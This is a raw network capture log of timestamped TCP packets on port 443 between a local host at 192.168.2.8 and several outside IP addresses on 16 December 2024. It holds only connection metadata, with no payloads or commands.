                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.937031984 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.937053919 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.938941956 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.939018011 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.939033031 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.988079071 CET44349768116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.988153934 CET49768443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.988166094 CET44349768116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.988178968 CET44349768116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.988240957 CET49768443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.989236116 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.989259005 CET49768443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.989276886 CET44349768116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.989300966 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.010865927 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.011045933 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.011116982 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.019509077 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.019615889 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.019654036 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.028187990 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.028316975 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.028337955 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.038070917 CET44349789116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.038263083 CET49789443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.038806915 CET49789443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.038822889 CET44349789116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.038939953 CET49796443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.039043903 CET44349796172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.039237022 CET49797443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.039266109 CET44349797172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.039304972 CET49796443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.039526939 CET49796443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.039541960 CET49797443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.039556026 CET44349796172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.039889097 CET49797443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.039902925 CET44349797172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.041232109 CET49789443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.041233063 CET49789443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.041259050 CET44349789116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.041291952 CET44349789116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.041474104 CET49789443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.041497946 CET44349789116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.041543961 CET49789443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.041558027 CET44349789116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.041645050 CET49789443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.041667938 CET49789443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.041794062 CET44349789116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.043097019 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.043180943 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.043200970 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.064723015 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.066143990 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.066179991 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.069705963 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.070012093 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.070028067 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.079972982 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.080291986 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.080310106 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.093772888 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.094141006 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.094158888 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.107515097 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.107650995 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.107670069 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.120704889 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.120850086 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.120871067 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.132159948 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.132384062 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.132405043 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.144121885 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.144284964 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.144304991 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.156335115 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.156728029 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.156755924 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.167922020 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.168231964 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.168251991 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.193923950 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.194093943 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.194155931 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.196278095 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.196552992 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.196569920 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.204108000 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.204528093 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.204547882 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.211551905 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.212045908 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.212105989 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.219541073 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.220868111 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.220896006 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.227178097 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.227746010 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.227762938 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.234735966 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.234939098 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.234957933 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.242274046 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.242738008 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.242800951 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.250755072 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.251247883 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.251270056 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.257543087 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.257916927 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.257935047 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.265422106 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.265930891 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.265961885 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.274246931 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.278430939 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.278456926 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.280200958 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.282433987 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.282454967 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.288018942 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.288249016 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.288275957 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.296042919 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.296411037 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.296432018 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.303145885 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.310131073 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.310148954 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.310970068 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.311028004 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.311034918 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.318380117 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.322298050 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.322313070 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.326625109 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.330189943 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.330218077 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.334196091 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.338212013 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.338227034 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.346071959 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.348284006 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.348315001 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.348329067 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.348391056 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.348397970 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.355969906 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.356044054 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.356055975 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.363156080 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.363472939 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.363482952 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.369960070 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.370127916 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.370138884 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.382843018 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.382870913 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.382903099 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.382916927 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.383548975 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.384385109 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.388190985 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.388382912 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.388408899 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.388417006 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.388627052 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.393189907 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.397748947 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.397829056 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.397839069 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.402767897 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.402899027 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.402937889 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.402946949 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.403204918 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.408003092 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.412184954 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.412233114 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.412259102 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.412267923 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.412663937 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.416533947 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.417387962 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.417573929 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.417573929 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.649426937 CET44349791172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.649981976 CET44349790172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.669917107 CET49790443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.669962883 CET44349790172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.670007944 CET49791443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.670036077 CET44349791172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.670519114 CET44349791172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.671205044 CET44349790172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.671350002 CET49790443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.671917915 CET49790443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.671921968 CET49791443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.671993017 CET44349790172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.672003984 CET44349791172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.714303017 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.714355946 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.715207100 CET49790443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.715209961 CET49791443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.715225935 CET44349790172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.715296984 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.716926098 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.716941118 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.731260061 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.731288910 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.761396885 CET49790443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.934017897 CET49807443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.934072971 CET4434980723.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.934551001 CET49807443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.935399055 CET49807443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.935414076 CET4434980723.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.947772026 CET49808443192.168.2.820.110.205.119
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.947824001 CET4434980820.110.205.119192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.947889090 CET49808443192.168.2.820.110.205.119
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.948477030 CET49808443192.168.2.820.110.205.119
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.948487997 CET4434980820.110.205.119192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.979648113 CET44349793172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.979922056 CET49793443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.979959011 CET44349793172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.980655909 CET44349795172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.981018066 CET44349793172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.981077909 CET49793443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.981158018 CET44349794172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.981360912 CET49795443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.981370926 CET44349795172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.981535912 CET49794443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.981558084 CET44349794172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.981867075 CET44349792172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.982167006 CET49793443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.982222080 CET44349793172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.982470036 CET49792443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.982482910 CET44349792172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.982578039 CET44349794172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.982630968 CET49794443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.983293056 CET49794443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.983361006 CET44349794172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.984555006 CET44349792172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.984616995 CET49792443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.984931946 CET49792443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.985043049 CET44349792172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.985083103 CET44349795172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.985141993 CET49795443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.987874985 CET49795443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.988080978 CET44349795172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.028059959 CET49793443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.028114080 CET49792443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.028115034 CET49794443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.028146982 CET44349793172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.028163910 CET44349792172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.028189898 CET49795443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.028192997 CET44349794172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.028207064 CET44349795172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.074013948 CET49792443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.074022055 CET49793443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.074208975 CET49794443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.074219942 CET49795443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.249967098 CET44349796172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.250201941 CET49796443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.250240088 CET44349796172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.251261950 CET44349796172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.251357079 CET49796443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.252449036 CET44349797172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.252840042 CET49796443192.168.2.8172.64.41.3
